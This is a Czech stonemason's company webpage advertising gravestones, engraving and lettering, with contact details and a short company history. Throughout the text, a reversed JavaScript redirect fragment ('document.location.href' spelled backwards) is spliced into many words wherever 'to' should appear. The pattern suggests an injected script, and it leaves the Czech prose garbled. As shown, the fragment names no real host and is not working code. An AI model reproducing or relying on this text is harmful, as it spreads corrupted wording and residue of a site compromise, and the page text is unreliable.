Žďár nad Sázavou, řemeslo, kamenictví, Jaroslav Cafourek, pomníky, hroby
Rainbow page separator

KAMENICTVÍ – Jaroslav Cafourek

Kamenictví Jaroslav Cafourek Vysočina

www.kamenictvicafourek.cz

do-textu-kamenictvi-cafourek-firma-uvod-2KAMENICTVÍ CAFOUREK

Naše nabídka:

 

Kontakt:

Kamenictví Jaroslav CAFOUREK

Kancelář:

Jamská 1670/30

591 01 Žďár nad Sázavou

 

Provozní  doba:

telefonicky lze sjednat schůzku v  kanceláři   nebo přímo u Vás na místním hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově.

Ozvěte se nám a rádi za Vámi po domluvě zajedeme. Není problém dohodnout se i mimo pracovní dny, pokud nelze jinak.

Mobil: +420 603 29 31 36

E-mail:  [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to:kamenictv%C3%ADcafourek@seznam.cz“>kamenictvicafourek@seznam.cz

Web: www.kamenictvicafourek.cz

Plátce DPH                 DIČ: CZ7110054732            IČO: 68639686

KAMENICTVÍ CAFOUREK

Zde je  vše přehledně členěno na urnové pomníky,  jednohroby  a  dvojhroby. Dále je zde nástíněno, jak vypadají realizace písma,  gravírace na kámen a plastiky  do kamene.
Ve fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];togalerii jsou použity pouze naše realizace řešení  pomníků,  nikoliv stavby pomníků konkurenčních firem, které rády přidávají naše realizace do svých reklamních materiálů nebo rády čerpají z našich fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];togalerií.  Gravírace a plastiky do kamene jsou  speciali[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou naší firmy a pokusy o napodobení  hovoří samy za sebe..

Urnové pomníky:

Jednohroby:

Dvojhroby:

Gravírace, plastiky:

Gravírace je technika, jak  přidat na kámen ornament nebo motiv, čímž dojde k odlišení od ostatních nápisních těl. Je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to technologie trvalého rázu, lze odstranit pouze přebroušením pomníku, stejně jako u nápisu. Lze zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovit i gravíraci dle Vašeho návrhu, fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie.
Plastiky jsou opracování kamene sochařským způsobem, kdy lze do kamene ručně i za pomoci technologie přenést různé motivy.

Písmo:

Písmo provádíme sekané – ruční práce. Výhodou je , že lze nápis na pomník vysekat i přímo na hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově, odpadá demontáž, montáž a doprava v případě dalšího přípisu.
Písmo provádíme ve zlatě, kde se používá zla[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to plátkové o ryzosti 23,75 karátů, dále ve  stříbře , případně  v černé barvě určené speciálně na kámen.
Lze vytvořit jakýkoliv nápis, i dle Vašeho návrhu, který nám dodáte.

OLYMPUS DIGITAL CAMERAKAMENICTVÍ CAFOUREK

Něco málo z his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie firmy Kamenictví Jaroslav Cafourek.

Firma vznikla v roce 1999 za pomoci rodinné firmy, která funguje již od roku 1992 a od té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to doby preferujeme především hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní architekturu  a služby s tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to spojené.

Podnikáme na bázi fyzické osoby, kde se neschováváme za název firmy a snažíme se volit osobní OLYMPUS DIGITAL CAMERApřístup ke každému zákazníkovi, který má zájem o naše služby. Naše aktivity jsou rozvětveny po větší části Moravy, výrobu řešíme z jednoho rodinného  závodu, kde je na skladě asi 150 tun přírodních materiálů – především žul a mramorů. Zde je kompletní technologické vybavení pro uspokojování požadavků našich zákazníků.

Priori[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou firmy je spokojený zákazník, individuální řešení pro každého a v neposlední řadě dodržování dohodnutých podmínek a OLYMPUS DIGITAL CAMERAtermínů – na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to si velmi zakládáme.

Pomníky a doplňky pomníků řešíme vlastní výrobou, případně doplňky odebíráme od ověřených a kvalitních dodavatelů, kteří již též mají nějakou his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torii, neboť v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to oboru teprve čas ukáže kvalitu provedení a použitých materiálů.

Věnujeme se především výrobě tvarových pomníků, ale není pro nás problém jakýkoliv tvar – od OLYMPUS DIGITAL CAMERAjednoduchých až po velmi náročné provedení pomníků.

Vše je otázkou požadavku zákazníka.

OLYMPUS DIGITAL CAMERA